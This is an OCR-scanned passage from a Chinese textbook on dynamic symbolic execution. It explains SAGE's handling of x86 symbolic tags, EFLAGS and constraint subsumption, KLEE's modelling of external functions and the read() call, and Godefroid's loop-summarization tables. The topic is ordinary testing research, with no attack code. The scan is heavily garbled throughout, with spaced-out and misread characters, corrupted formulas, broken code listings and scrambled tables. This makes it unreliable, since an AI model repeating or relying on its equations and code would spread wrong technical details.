分 析 结 果 输 出 就 可 以 找到 产生 问题 的 路 径 和 根本 原因 ,帮助 分 析 者 进一步 完善 
SAGE, 

(2) 基于 x86 指令 的 符号 执行 技术 。 

(D ARER. 

SAGE 将 程序 执行 过 程 使 用 到 的 所 有 与 符号 相关 的 内 存 地 址 都 记录 到 映射 表 中 ,该 
表格 记录 了 每 个 字 节 在 内 存 中 的 地 址 和 符号 标签 的 对 应 关系 。 一 个 符号 标签 可 以 表示 外 
部 输入 测试 用 例 中 的 一 个 字 节 ,或 者 是 一 些 外 部 输入 字 节 的 表达 式 等 。SAGE 支持 以 下 
几 种 类 型 的 符号 标签 : 

* input(m) 表 示 测 试用 例 的 第 m 个 字 节 。 

。 表示 一 个 常数 。 

* 5 op tz 表示 一 些 数 学 运算 或 者 位 运算 的 结果 ,op 是 操作 码 ,t 和 1s 表示 操作 数 。 

。 标签 序列 过 to. .4 二 当 n 二 1 时 表示 一 个 字 大 小 的 符号 变量 , 当 ”一 3 时 表示 一 个 

双 字 大 小 的 变量 。 

。 子 标签 二 ,i 一 表示 1 符号 变量 中 第 i 个 字 节 。 

SAGE 不 支持 对 符号 指针 解 引用 的 表示 。 

© 指针 解 引 用 问题 。 


int* ip-100; 

* ip; 

上 面 代码 的 第 2 行 就 是 指针 解 引用 。 对 于 符号 指针 ,无 法 知道 其 具体 指向 了 哪个 地 
址 ,定义 指针 解 引 用 也 是 没有 意义 的 。 

© EFLAGS 标记 位 。 

SAGE 使 用 程序 执行 记录 重 放 进行 符号 分 析 , 根 据 每 一 条 指令 的 语义 信息 对 符号 变 
量 与 内 存 的 映射 关系 进行 更 新 。 除 了 分 析 符 号 变量 的 传递 关系 ,SAGE 还 需要 对 受 符号 
变量 影响 的 约 东 条件 进行 提取 。 例 如 , 当 符号 执行 引擎 分 析 到 一 条 由 外 部 输入 字 节 控制 
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的 条 件 跳 转 时 ,就 会 创建 一 个 约束 条 件 模型 以 记录 当前 的 约束 和 在 此 条 件 跳 转 处 执行 的 
分 支 ,最 后 将 该 约束 模型 添加 到 pc 中 。 下 面 用 一 个 简单 的 例子 说 明 SAGE 是 如 何 处 理 
符号 变量 和 约束 条 件 的 : 


#read 10 byte file into a buffer beginning at address 1000 


mov ebx,1005 

mov al,byte [ebx] 

decal #decrement al 
jz LabelForIfZero $Jump if al==0 


上 面 的 x86 指令 片段 中 ,首先 使 用 系统 调用 从 文件 中 读 取 10 个 字 节 ,并 将 这 10 个 字 
节 放 入 一 个 数组 中 ,假设 读 取 的 起 始 地 址 为 1000, 为 了 方便 描述 ,这 里 省 略 了 具体 的 读 取 
过 程 。 文 件 读 取 及 数组 赋值 完成 后 ,SAGE 为 这 10 个 字 节 所 在 的 内 存 地 址 (1000 一 1009) 
创建 对 应 的 符号 标签 input(0) 一 input(9)。 下 面 的 两 个 mov 指令 执行 的 操作 是 将 读 入 的 
第 6 个 字 节 input(5) 传 递 到 al 寄存 器 中 ,1005 在 这 里 表示 数组 第 1005 个 字 节 地 址 的 指 
针 , 在 执行 了 这 两 条 指令 后 ,SAGE 创建 了 一 个 新 的 映射 关系 ,al= 二 input(5)。 上 面 代 码 
的 最 后 两 条 指令 是 对 al 寄存 器 中 的 值 进行 减 1 操作 ,并 判断 al 一 1 后 的 值 是 否 为 0。 两 
个 指令 执行 完 后 ,SAGE 会 添加 一 个 新 的 符号 变量 ,t=input(5) 一 1, 并 为 路 径 约束 添加 
一 个 新 的 条 件 t=0 或 者 t! 王 0, 如 果 程 序 在 jz 指令 处 跳 转 则 选择 t=0, 反 之 选择 01—0, 

上 面 的 例子 看 似 简单 ,但 实际 上 又 引出 了 在 处 理 x86 指令 流 时 的 一 个 重要 问题 。 上 
面 的 jz 指令 实际 上 判断 的 是 EFLAGS 标记 位 中 的 ZF 位 是 否 为 1, 而 ZF 标记 位 受 上 面 
dec 操作 的 直接 影响 , 若 将 指令 的 语义 直译 过 来 就 是 al 一 1===0 为 影响 跳 转 的 条 件 。 但 
是 如 何 建立 从 ZF 到 符号 变量 之 间 的 关系 呢 ? ZF 标记 位 属于 一 个 特别 的 寄存 器 
EFLAGS, 其 中 包含 了 运行 状态 标记 位 ,例如 CF、ZF、AF、PF、OF 和 ZF。 这 些 位 的 状态 
完全 由 各 类 指令 的 运行 结果 决定 。 例 如 EFLAGS 的 第 一 个 标记 位 CF( 进 位 标记 位 ) , 若 
算术 操作 产生 的 结果 在 最 高 有 效 位 (most-significant bit) 发 生 进 位 或 借 位 时 将 其 置 1, 反 
之 清 零 。 另 外 ,该 标志 同样 会 在 多 倍 精度 运 算 (multiple-precision arithmetic) 中 使 用 。 第 
7 位 为 ZF( 零 标志 位 ), 若 前 面 指令 的 运算 结果 为 0 则 将 其 置 1, 反 之 清 零 。 除 了 运算 指 
令 会 间接 影响 标志 位 ,sete 和 pushf 等 指令 会 通过 直接 赋值 来 影响 EFLAGS 寄存 器 。 

为 了 处 理 与 EFLAGS 类 似 的 寄存 器 ,SAGE 定义 了 一 种 位 级 的 符号 向 量 描述 方法 ， 
fe.. fi 二 描述 了 一 个 有 个 位 的 符号 变量 。 对 于 上 面 的 例子 , 重 放 dec 指令 时 ， 
SAGE 创建 :一 input(5) 一 1 的 同时 会 将 EFLAGS 的 CF 和 ZF 位 与 符号 变量 上 建立 关系 
(根据 x86 指令 手册 ,dec 操作 只 影响 这 两 个 标记 位 ) ,后 面 无 论 是 jz 还 是 jc 都 能 直接 找到 
对 应 的 和 符号 相关 的 约束 表达 式 。 

对 于 约束 条 件 对 应 真 值 的 问题 ,SAGE 进行 如 下 处 理 , 当 jz 指令 执行 时 无 法 知道 约 
东 条 件 对 应 的 真 值 ,SAGE 根据 跳 转 指令 下 一 条 执行 的 指令 地 址 来 进行 判断 。 

GD 数据 类 型 转换 。 

另 一 个 在 x86 指令 中 比较 难处 理 的 问题 就 是 字 节 、 字 和 双 字 数据 对 象 的 转换 。 可 能 
大 多 数 时 候 程序 中 不 会 有 显 式 的 转换 过 程 , 但 还 是 有 很 多 外 部 函数 可 以 进行 这 样 的 操作 ， 
例如 atol, malloc, memcpy 函数 等 。SAGE 通过 子 标签 和 序列 标签 来 处 理 这 个 问题 。 下 


se 
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面 使 用 一 个 简单 示例 来 说 明 解 决 方法 。 
mov ch,byte[-] 


mov cl,byte[…] 


inc cx fincrement cx 


上 面 的 这 段 指令 中 ,假设 前 面 的 两 条 mov 指令 读 取 的 内 存 地 址 对 应 的 符号 变量 分 别 
28 t 和 4, 执行 后 ch 寄存 器 与 后 建立 映射 关系 ,cl 与 n 建立 映射 关系 。 最 后 一 条 指令 
inc 是 对 cx 寄存 器 的 操作 ,已 知 ex 的 高 8 位 由 ch 表示 , 低 8 位 由 cl 表示 ,所 以 在 运算 前 
SAGE 首先 将 cx 表示 为 序列 符号 二 4 t> A inc 操作 后 将 新 建 一 个 符号 标记 1, 其 表 
示 的 是 (一 二 十 1) ,同时 SAGE 会 更 新 ch 和 cl 的 符号 表示 为 subtag(1,0)、subtag(1,1)。 
假设 z= 过 zi x27 S] 2, doa; * 256.0, — subtagG 0) 4a; — subtagCG 10 nf DUE SI. 
通过 序列 标签 和 子 标签 就 可 以 为 不 同 长 度 的 变量 建立 直观 的 表示 方法 和 约束 关系 。 

© 约束 优化 。 

为 了 提高 符号 执行 效率 和 内 存 使 用 率 ,SAGE 做 出 了 很 多 约束 优化 操作 ,这 里 只 介绍 
了 其 中 公开 的 部 分 一 一 子 包 含 技术 。 通 过 下 面 的 例子 来 解释 SAGE 实现 的 子 包含 技术 。 


mov cl,byte[***] 
deccl #decrement cl 
ja2 #jump if cl>0 


上 面 的 代码 片段 首先 载 入 一 个 字 节 到 cl 寄存 器 中 ,并 且 在 循环 中 对 该 值 不 断 做 减 1 
操作 ,直到 cl 中 值 为 0(ja 2 中 的 2 为 指令 序号 ,这 里 对 应 的 就 是 dec cl 这 条 指令 )。 假 设 
载 人 到 cl 寄存 器 中 的 值 对 应 的 符号 标签 为 t0 ,使 用 前 面 的 分 代 搜 索 算 法 会 生成 下 面 的 一 
系列 约束 条 件 : 5290.4 770 RI 1,350 Hir RACES SE E 7 1— 65 — 1. HK 
中 i 属于 {1..k)}。 符 号 执行 上 面 的 指令 片段 时 ,内 存 的 消耗 是 呈 线 性 增长 的 ,因为 每 次 循 
环 都 会 生成 一 个 新 的 变量 和 新 的 约束 条 件 。 

实际 上 ,对 于 路 径 约束 序列 中 的 前 4A 一 2 个 约 东 是 可 以 删除 的 ,因为 当 最 后 两 个 约束 
Ci 二 0 和 4 过 0) 成 立 的 时 候 ,前 面 的 一 2 个 显然 成 立 。 结 合 前 面 生成 的 约束 表达 式 和 
符号 变量 ,这 里 可 以 得 到 下 面 的 表达 式 ,一 1 王 上 4-: 一 1 王 … 王 (一 c) 一 1 一 bm 一 (c 十 1) ,所 
以 可 以 将 路 径 约束 化 简 为 wm 一 (一 1) 二 0 和 1 一 k 三 0。 这 就 是 子 包含 技术 ,通过 删除 元 
余 的 约束 表达 式 , 一 方面 可 以 降低 程序 执行 时 的 内 存 消耗 , 另 一 方面 可 以 提高 路 径 遍 历 的 
效率 。 

分 代 搜 索 策略 与 SAGE 系统 协同 工作 满足 了 设计 者 对 系统 的 设计 要 求 。 


524 动态 符号 执行 技术 中 的 关键 问题 

1. 外 部 函数 调用 问题 

程序 对 外 部 函数 的 调用 过 程 如 图 5-18 所 示 ,通常 情况 下 ,外 部 函数 的 内 部 细节 对 调 
用 程序 来 说 是 黑 盒 式 的 , 即 ,可 能 无 法 使 用 符号 执行 引擎 对 其 内 部 控制 流 进行 跟踪 。 为 了 
避免 分 析 在 外 部 函数 调用 处 中 断 ,研究 人 员 提 出 了 以 下 几 种 缓解 措施 。 
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图 5-18 ”外 部 函数 调用 实例 


D 具体 值 蔡 换 

动态 符号 执行 工具 DART .CUTEC 等 使 用 具体 值 蔡 代 方法 缓解 了 外 部 函数 调用 问 
题 ,虽然 仍 无 法 追踪 外 部 函数 的 内 部 执行 流程 ,但 通过 使 用 实际 执行 外 部 函数 得 到 的 结果 
对 函数 返回 值 进行 填充 ,可 以 使 符号 执行 引擎 对 该 路 径 的 分 析 继 续 执行 ,在 一 定 程度 上 增 
加 了 测试 时 的 代码 覆盖 率 。 但 是 ,具体 值 替 换 法 无 疑 会 使 分 析 过 程 遗 漏 一 些 路 径 分 支 ,这 
也 导致 动态 符号 执行 系统 会 产生 一 定数 量 的 漏 报 。 

2) 外 部 函数 建 模 

动态 符号 执行 工具 KLEEI 为 解决 这 一 问题 提出 了 外 部 函数 建 模 的 方法 。KLEE Ñ 
过 对 程序 要 调用 的 外 部 函数 进行 充分 的 分 析 , 根 据 对 其 操作 语义 的 理解 建立 函数 模型 ,为 
调用 函数 生成 所 需 的 约束 条 件 , 从 而 帮助 符号 执行 引擎 对 程序 进行 全 局 的 符号 分 析 ( 包 括 
对 外 部 调用 函数 )。KLEE Jy POSIX 中 40 多 个 系统 函数 进行 了 建 模 , 包 括 open, read, 
write stat \lseek 等 函数 。 在 分 析 过 程 中 , 当 进 行 外 部 函数 调用 的 参数 中 不 涉及 符号 变量 
时 由 系统 实际 函数 进行 处 理 , 反 之 ,调用 KLEE 建立 的 函数 模型 模拟 调用 过 程 ,为 分 析 过 
程 生成 完整 的 路 径 条 件 约束 ,除了 对 系统 函数 建 模 ,KLEE 还 对 文件 系统 进行 了 建 模 。 

文件 系统 函数 模型 : 简单 地 说 ,对 于 每 个 访问 文件 系统 的 操作 KLEE 都 会 进行 检查 ， 
查看 这 个 操作 是 访问 磁盘 上 的 一 个 具体 文件 还 是 一 个 符号 文件 。 对 于 具体 文件 , KLEE 
的 处 理 方式 就 是 直接 调用 相应 的 系统 函数 进行 操作 ;对 于 符号 文件 ,KLEE 会 调用 系统 函 
数 模 型 模拟 真实 系统 函数 对 符号 文件 进行 操作 ,目的 就 是 和 系统 函数 的 操作 保持 一 致 , 对 
符号 文件 达到 相同 的 影响 。KLEE 的 建 模 可 以 看 成 是 对 系统 函数 的 扩展 ,因为 真实 的 系 
统 函 数 是 不 能 处 理 符号 变量 的 。 图 5-19 中 的 代码 就 是 对 系统 函数 read 操作 行为 的 建 
模 ,其 中 省 略 了 对 标准 输入 流 的 操作 、 读 取 失 败 的 操作 等 代码 。 

函数 首先 处 理由 open( 〇 函数 创建 的 文件 描述 符 ( 第 2~5 行 ) ,判断 其 是 否 有 效 。 系 
统 中 维护 了 一 个 文件 是 具体 文件 或 符号 文件 的 关系 表 , 使 用 is_concrete_file(f) 函数 对 文 
件 类 型 进行 检查 。 如 果 为 具体 文件 ,通过 调用 系统 函数 pread() 读 取 文 件 , 即 使 用 文件 在 
真实 文件 系统 中 的 描述 符 读 取 文 件 中 的 实际 值 ( 第 8 一 11 行 ); 如 果 fd 指向 了 一 个 符号 文 
FE» read O 函数 从 底层 与 符号 文件 对 应 的 符号 数组 中 复制 到 为 用 户 提 供 的 文件 内 容 数 组 
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ssize t read(int fd, void *buf, size t count) ( 
if (is invalid(fd)) { 
ermo = EBADF; 
retum 一 1; 


} 
struct klee fd *f = &fds[fd]; 
if (is concrete file(f)) { 
int r = pread(f—real fd, buf, count, f——off); 
9 if (r!- -1) 
10 f-»off— r; 
11 return r; 
12 ]jelse( 
13 /* sym files are fixed size: don't read beyond the end */ 
14 if (f-^off >= f-^size) 
15 return 0; 
16 count = min(count, f->size 一 f->off); 
17 memcpy(buf, f—file data + f->off, count); 








18 f-»off += count; 
19 return count; 

20 |] 

21 } 
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buf 中 (第 13 一 19 行 ) ,这 样 做 保证 了 各 read 棒 数 在 访问 相同 的 文件 时 使 用 的 是 相同 的 符 
号 变量 。 

KLEE 目前 的 文件 系统 模型 还 是 相对 粗糙 的 ,包含 了 一 个 目录 ,其 中 记录 了 多 个 符 
号 文件 。 符 号 文件 系统 和 实际 文件 系统 是 共存 的 ,所 以 每 个 应 用 都 可 以 访问 这 两 个 文 
件 系统 , 当 程序 调用 open 函数 , 且 其 中 的 文件 名 称 为 具体 文件 时 ,就 打开 具体 文件 ， 
例如 : 


int fd-open("/etc/fstab", O RDNLY); 


首先 在 真实 的 文件 系统 中 搜索 文件 路 径 , 发 现 fd 是 指向 一 个 实际 存在 的 文件 /etcyfstab。 
如 果 在 直 实 系统 中 未 找到 fd 指向 的 文件 , 则 进入 符号 文件 系统 ,如 果 系统 中 的 符号 文件 
中 不 存在 一 个 相同 的 符号 文件 名 称 , 则 访问 将 失败 。 
2. 循环 问题 i 
循环 问题 一 直 是 符号 执行 领域 的 热点 ,但 研究 人 |2 meto: 
员 一 直 没 有 提出 理想 的 解决 模型 。 下 面 对 循 环 问题 和 |》 O orea 
其 解决 方案 进行 介绍 。 if (c==50)abort1(); /异常 1 
9 
1 
1 





void main (int x)( // x 是 函数 输入 


c=c+l; 
符号 执行 中 的 路 径 烛 炸 问题 一 方面 是 由 于 程序 自 p pte; 
身 代码 规模 庞大 造成 的 , 另 一 方面 是 由 于 程序 中 存在 
依赖 于 符号 变量 的 循环 造成 的 。 不 论 是 静态 符号 执行 
还 是 混合 符号 执行 中 都 面临 着 循环 问题 。 在 图 5-20 
的 main 函数 中 ,while 循环 的 执行 次 数 依赖 于 输入 参 
数 x 的 取 值 ,这 就 是 典型 的 符号 执行 循环 问题 。 


} 
if (c—30) abort(); /异常 2 











5-20 ”循环 问题 代码 示例 
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假设 以 as — 10 作为 初始 测试 值 ,对 main 函数 进行 混合 符号 执行 测试 后 ,第 一 条 程序 

执行 路 径 对 应 的 路 径 约束 为 
pe = (4 200 Nm 120) A A (4, 970) A (x, —10 0) 

可 以 看 到 while 循环 中 所 有 与 输入 相关 的 约束 条 件 都 被 记录 到 路 径 约 束 中 ,而 与 符 
号 变量 不 直接 相关 的 if(c 一 一 50) 分 支 则 被 忽略 。 使 用 SAGE 工具 中 的 搜索 算法 对 路 径 
条 件 进行 扩展 ,因为 分 代 搜索 算法 会 分 别 对 路 径 中 的 每 个 约束 进行 取 反 操作 ,所 以 算法 结 
束 时 会 生成 10 个 测试 用 例 ,使 用 新 生成 的 测试 用 例 继续 对 main. 函数 进行 分 析 。 不 断 迭 
代 上 面 的 过 程 ,假设 测试 时 不 对 符号 变量 x, 设置 边界 , 则 对 main 函数 的 分 析 过 程 可 能 永 
远 不 会 结束 ,这 就 是 循环 问题 的 危害 ,即使 一 个 简短 的 程序 也 可 能 引发 路 径 爆 炸 。 

研究 人 员 不 断 尝试 解决 该 问题 ,并 提出 了 多 种 缓解 方法 。SAGE 使 用 的 是 循环 约束 
优化 的 方法 , 即 , 当 符号 执行 引擎 发 现 一 条 路 径 约束 中 有 多 个 连续 的 约束 条 件 与 同一 条 件 
指令 相对 应 , 则 对 这 些 约束 条 件 进行 化 简 。 这 样 虽然 防止 了 无 限 循 环 的 问题 ,但 对 于 某 些 
路 径 , 例 如 图 5-20 中 的 if(c 二 二 50) 分 支 可 能 无 法 遍历 ,使 得 分 析 过 程 遗漏 了 程序 中 的 某 
些 路 径 分 支 ,尽管 简化 了 问题 ,但 严重 影响 了 分 析 精 度 。IntScopec 对 依赖 于 符号 的 循环 
只 执行 一 次 ,该 方法 同样 是 用 精度 换 效 率 。LESEC] 首 次 尝试 解决 循环 优化 造成 的 精度 降 
低 问 题 ,其 为 每 一 个 循环 的 循环 次 数 变 量 都 分 配 一 个 符号 值 ,LESE 通过 推理 分 析 循环 次 
数 与 程序 代码 中 其 他 变量 的 关系 表达 式 , 继 而 得 出 遍历 循环 中 各 分 支 所 需要 满足 的 循环 
次 数 的 约束 条 件 , 但 LESE 无 法 处 理 循环 典 套 问题 。 目 前 认可 度 最 高 的 方案 是 循环 摘要 
方法 ,该 方法 由 Tsitovich ? S&H , P. Godefroid 中 对 其 进行 了 优化 ,下 面 就 对 循环 摘要 方法 
进行 介绍 。 

1) 循环 摘要 方法 

(1) 基本 概念 。 

在 介绍 循环 摘要 方法 之 前 先 给 出 以 下 定义 ,假设 用 整数 变量 i 定义 循环 执行 次 数 : 

。 归纳 变量 (IV)。 是 循环 中 随 着 迭代 次 数 的 增加 线性 增长 的 变量 ,IV; 二 IVo 十 i 

* no 

。 线性 约束 条 件 。 如 果 循 环 中 的 一 个 约束 条 件 符合 LHS« RHS 的 形式 ,其 中 € 
{二 , 达 ,二 , 宇 , 冯 , 二 }, 且 左 表达 式 (LHS) 或 右 表达 式 (RHS) 中 包含 归纳 变量 ， 
则 称 该 约束 为 线性 约束 条 件 。 
循环 守卫 。 对 于 循环 中 依赖 于 线性 约束 条 件 的 分 支 语句 ,如 果 其 then 或 else 分 
支 跳 转 的 目的 地 址 在 循环 结构 外 , 则 称 该 条 件 分 支 为 循环 守卫 。 

归纳 变量 表 (IVT)。 

归纳 变量 表 是 用 来 记录 和 维护 循环 中 所 有 变量 的 变化 情况 ,只 要 循环 体内 的 变量 随 
着 迭代 次 数 的 增加 做 线性 变化 ,根据 归纳 变量 的 定义 就 可 以 判定 该 变量 为 归纳 变量 。 归 
纳 变 量 表 共 包含 6 列 : 

* iteration: 循环 迭代 次 数 。 

。 line: 循环 体 中 对 变量 值 进行 修改 的 代码 所 对 应 的 行 数 。 

. V: 控制 流 到 达 第 line 行 代码 前 变量 的 具体 值 。 

* VS: 变量 在 循环 体 中 的 初始 符号 值 。 
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。 dV: dV—V,— Via ,变量 在 第 i 轮 和 i 一 1 轮 循环 中 的 差 值 。 

。 dVS: dVS—- VS, — VS.,.dV 的 符号 表示 。 

下 面 就 用 实例 来 说 明 如 何 维护 归纳 变量 表 并 判断 归纳 变量 。 以 x — 10 作为 函数 输 
入 值 , 在 第 一 轮 循环 迭代 中 ,归纳 变量 表 只 对 循环 体 中 出 现 的 变量 进行 记录 。 例 如 ,程序 
执行 到 第 6 行 时 变量 c 出 现 ,其 初始 值 co 二 0, 因 为 与 输入 参数 无 直接 关系 ,所 以 符号 值 
cs 二 0。 因 为 是 第 一 次 记录 该 值 ,所 以 变量 c 不 存在 变化 量 (dV,dVS)。 将 以 上 数据 写 入 
表 项 ,并 以 此 类 推 对 下 面 的 代码 进行 分 析 。 从 循环 的 第 二 次 迭代 开始 ,只 对 每 个 变量 的 
dV .dVS、V 值 进 行 修改 。 以 变量 c 为 例 ,第 二 次 执行 到 第 6 行 代码 时 ,c 的 值 eo 1. 
dCi 二 a 一 co 二 1,dCs 二 0 一 0 二 0。 从 第 三 次 过 代 开始 ,只 对 变量 的 dV 值 进行 修改 ,并 且 
根据 dV 判断 变量 是 否 为 归纳 变量 ,如 果 不 符合 条 件 , 则 从 归纳 变量 表 中 删除 表 项 。 仍 以 
前 面 的 代码 为 例 , 对 于 变量 p. dP, — 1. dP; — 1. dP; 二 3, 说 明 到 第 三 轮 迭 代 时 就 已 经 无 法 
用 公式 IV; SIV, 十 i* n 对 变量 进行 描述 ,所 以 变量 p 不 为 归纳 变量 ,将 其 从 归纳 变量 表 
中 移 除 。 以 上 过 程 可 用 算法 描述 ,如 图 5-21 所 示 。 

















1  updateIVT(iteration, IVT){ 

2 if (iteration ==2){ 

2 for v eIVT( 

4 IVT[v]. dV =M [v] -IVT [v] .V;V Ist value change 
5 IVT[v]. dVS = S [v] -IVT [v] .VS; 

6 IVT [v].V = M[v]); // used to compute future dV 

7 j 

8 


} else { // purge failed IV candidates 
9 forve IVT { 
10 dV-M [v]-IVT [v].V; // current change in value 
11 if(dV# IVT [v].dV) — // changed by same amount? 
12 remove v from IVT; // v is not an IV 
13 else 
14 IVT[v].V = M[v]; //usedto compute future dV 
15 } 
166 } 
17 } 











图 5-21 循环 摘要 算法 描述 
上 面 示例 对 应 的 计算 流程 如 表 5-5 所 示 。 

















表 5-5 计算 流程 
程序 执行 归纳 变量 表 (IVT) 变 化 序列 
循环 迭代 次 数 指令 行 数 Var v dV VS 
1 3 = = — 
1 6 c 0 — 0 
1 7 M 7 S 
P 0 = 0 
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续 表 
程序 执行 归纳 变量 表 (IVT) 变 化 序列 

循环 迭代 次 数 指令 行 数 Var bd dV VS 
0 一 0 
1 8 p 0 一 0 
x 10 = Xo 
1 1 0 
2 3 p 1 1 0 
x 9 ux Xo 
2 1 0 
3 3 p 3 1 0 
8 一 1 X; 
c 3 1 0 
3 à x 7 =f Xo 
o : c 9 1 0 
x 1 一 1 X 

















通过 算法 流程 描述 可 以 发 现 ,只 需要 维护 dV 和 V 两 个 变量 就 可 以 判断 变量 是 否 为 
归纳 变量 了 ,那么 VS 和 dVS 的 作用 是 什么 呢 ? 下面 给 出 答案 。 

© 循环 守卫 表 (GT) 。 

定义 循环 守卫 的 概念 主要 是 为 了 对 循环 体 中 的 条 件 语句 进行 初 得 ,P. Godefroid 认 
为 只 有 满足 循环 守卫 定义 的 条 件 语 句 才 是 符号 变量 有 可 能 控制 的 语句 。 循 环 守卫 的 判断 
方法 与 归纳 变量 类 似 ,同样 基于 表格 数据 的 维护 结果 。 循 环 守卫 有 两 个 充分 条 件 : 

。 线性 约束 条 件 。 

。 包含 跳 转 到 循环 体外 的 分 支 。 

下 面 以 这 两 点 要 求 设计 循环 守卫 表 的 表 项 : 

。 B: 当 控 制 流 执行 到 该 条 件 语 句 时 ,语句 内 约束 表达 式 的 布尔 值 。 

* D: LHS- RHS.B-(LHS€4 RHS) -((LHS- RHS) 40 —(D« 0), 
DS: D 的 初始 符号 值 。 
dD: D 一 old(D) ,两 轮 相 邻 的 迭代 中 D 的 差 值 。 
EC: 该 条 件 语句 在 循环 中 预期 的 执行 次 数 。 
ECS: EC 的 符号 值 。 
hit: 该 条 件 语 句 的 实际 执行 次 数 。 
DcondS, dDcondS; DS 和 dDS 需要 满足 的 约束 表达 式 。 

* loc: 该 条 件 语句 中 的 约束 表达 式 在 路 径 条 件 约束 序列 中 的 定位 。 

上 面 各 表 项 的 定义 中 ,EC 和 DcondS 较 难 理解 。 对 于 EC, 如 何在 程序 未 执行 完成 时 
就 预 判 一 条 语句 的 执行 次 数 呢 ? P. Godefroid 等 人 给 出 了 下 面 的 计算 公式 : 
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0 {Do 


EC; (<,D,dD) = co if D>0A dDz0 
(D—dD— D/—dD i D>0AdD<0 
其 基本 原理 就 是 根据 条 件 语句 D P RER S « mius sis gm cti B 
进行 计算 。 假 设 当前 循环 守卫 的 then 分 支 会 跳出 循环 ,约束 条 件 中 的 运算 符 4 为 三 , 首 
次 执行 该 语句 时 真 值 为 F, 通 过 上 面 的 条 件 可 以 判断 , 当 Do 之 前 ,该 条 件 语句 一 直 不 会 
使 控制 流 跳 转 到 循环 外 ,因此 使 用 D 和 dD 的 值 就 可 以 计算 出 循环 可 能 的 迭代 次 数 。 
为 循环 中 可 能 还 会 有 其 他 的 循环 守卫 ,这 些 语句 都 可 能 使 控制 流 跳 转 出 循环 ,所 以 这 里 计 
算 的 循环 迭代 次 数 及 语句 执行 次 数 只 能 是 预 估 值 。 
对 于 DcondS, 同 样 需要 根据 运算 符 全 特殊 对 待 , 当 忆 为 三 时 ,DecondS 和 dDcondS 的 
表达 式 如 下 面 的 代码 中 所 示 。DcondS 和 dDcondS 两 个 约束 条 件 是 保证 循环 在 当前 条 件 
分 支 处 可 以 正常 终止 的 充分 条 件 , 如 上 面 的 公式 所 示 ,如 果 约 束 条 件 D>0 和 dD 宇 0 成 立 ， 





























则 循环 的 执行 不 会 终止 : 
case& :( 
if (D>0){ 
if (dp< 0) { 
DcondS- DS» 0; 
dDcondS- dDS« 0; 
下 面 仍 以 图 5-20 中 代码 为 例 说 明 如 何 为 循环 体 中 的 条 件 语句 维护 循环 守卫 表 , 如 
表 5-6 所 示 。 
表 5-6 循环 守卫 表 
程序 执行 循环 守卫 表 (GT) 变 化 序列 
循环 迭代 次 数 | ”指令 行 数 B D dD EC ECS hit 
1 3 
1 4 F 10 — = = 1 
2 4 F 9 —t 10 xo 2 
10 4 F 1 =$ 10 Xo 10 
1 4 T 0 =f 10 xo 11 


























以 xo — 10 作为 函数 输入 值 ,对 于 第 四 行 的 条 件 语句 fa< — 00 ,控制 流 第 一 次 执行 
到 此 处 时 ,循环 守卫 表 只 能 获取 其 真 值 F,D 二 LHS 一 RHS 二 10, DS= x, 执行 次 数 (hit) 
加 1。 第 二 轮 迭 代 中 就 可 以 根据 公式 计算 dD. EC, ECS, DcondS 等 变量 。 从 第 三 轮 和 迭代 
开始 ,只 计算 dD 并 判断 该 条 件 语 句 是 否 为 循环 语句 。 循 环 守卫 表 的 更 新 算法 如 图 5-22 
所 示 。 

和 前 面 的 归纳 变量 表 类 似 , 循 环 守卫 表 实 际 上 只 需要 dD、D、B、hit 几 个 变量 就 可 以 
判断 一 个 条 件 语句 是 否 为 循环 守卫 。 那么 ,为 什么 需要 计算 EC 等 变量 ? 和 前 面 归纳 变 
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1 updateGT ( pc , cond , iter , GT ) { 

2  if(condis not symbolic 

3 v cond is not (LHS 4 RHS) witha € {<, <, >, 2 ,.-j 
4 V(iter> 1^ pc € GT) 

5 v both targets of statement at ( pc ) are in side loop ) 
6 return ; 

7 B = evaluate concrete ( cond ) ; 

8 D = evaluate concrete ( LHS — RHS ) ; 

9  if(iter—1)( 

10 GT [pc }¥ new entry , with GT [pc ] . hit 一 0 

11 GT[pc].B-B; 

12 GT[pc].D-D; 

13 GT[pc].DS = evaluate _ symbolic(LHS — RHS) ; 

14 GT [pc]. loc = current loc ( path constraint ) ; 

15 } 

16 elseif( iter —2) f 

17 GT[pc].dD- D-GT[pc].D: 

18 DS = evaluate symbolic(LHS — RHS); 

19 dDS - DS - GT [pc]. DS; 

20 switch ('A') { 


21 case <: { 

22 if(D>0) ( 

23 if (dD < 0) { 

24 DcondS=DS> 0; 

25 dDcondS = dDS < 0 ; 

26 GT [ pc ] . EC = (GT [pc].D- GT [pc].dD -U-GT [pc].dD ; 
27 GT [ pc ] . ECS -(GT [pc].DS- dDS —1)/-dDS ; 
28 } else … 

29 } else … 

30 H 

31 Em 

32 } 

33 } 


34 GT[pc].hit=GT[pc].hit+l; 

35 if(GT[pc].hit 7 iter )// candidates should execute 

36 { remove pc from GT; return } // once every iteration 

37 if(GT[pc]. B£ BAGT [ pc ]. Pending A iter —GT [ pc]. EC + 1) 
38 guess preconditions ( pc , GT ) ; 

39 if(GT[pc]. BZ BV GT [pc]. dDz D- GT[pc].D) 

40 remove pc from GT; 

41 else{ 

42  GT[pc].D-D; 

43 GT [ pc ] . pclocs . append ( current loc ( path constraint ) ) ; 
44 ] 








图 5-22 循环 守卫 表 更 新 算法 


量 表 中 的 dVs、Vs 表 项 又 有 什么 关系 呢 ? 在 下 面 关 于 循环 后 置 条 件 的 内 容 中 将 会 给 出 
答案 。 

(2) 循环 摘要 算法 。 

通过 前 面 对 定义 的 介绍 ,读者 可 能 已 经 能 够 猜 到 循环 摘要 方法 的 基本 思路 : 通过 引 
入 归纳 变量 表 , 识 别 出 循 环 体 中 所 有 与 迭代 次 数 线性 相关 的 变量 ,并 计算 出 这 些 变量 与 符 
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号 变量 间 的 表达 关系 ,再 借助 循环 守卫 表 对 可 控 条 件 分 支 的 识别 , 即 可 精确 定位 循环 中 所 
有 依赖 于 符号 变量 的 条 件 语句 ,通过 修改 符号 变量 的 取 值 就 可 以 快速 地 定向 遍历 循环 中 
所 有 分 支 语句 。 

P. Godefroid 的 循环 摘要 方法 有 两 个 步骤 : 生成 循环 前 置 条 件 ,生成 循环 后 置 条 件 。 
在 详细 说 明 这 两 个 步骤 之 前 , 先 给 出 下 面 两 条 引 理 ,这 两 条 引 理 一 方面 是 为 了 简化 循环 问 
题 的 难度 , 另 一 方面 是 为 了 给 后 面 的 操作 提供 理论 依据 。 

* 引 理 1( 唯 一 性 ) : 循环 的 每 一 轮 迭 代 中 ,各 循环 守卫 能 且 只 能 执行 一 次 。 

* 5B8 2( 有 序 性 ): 循环 中 各 守卫 间 的 相对 执行 顺序 是 保持 固定 的 。 

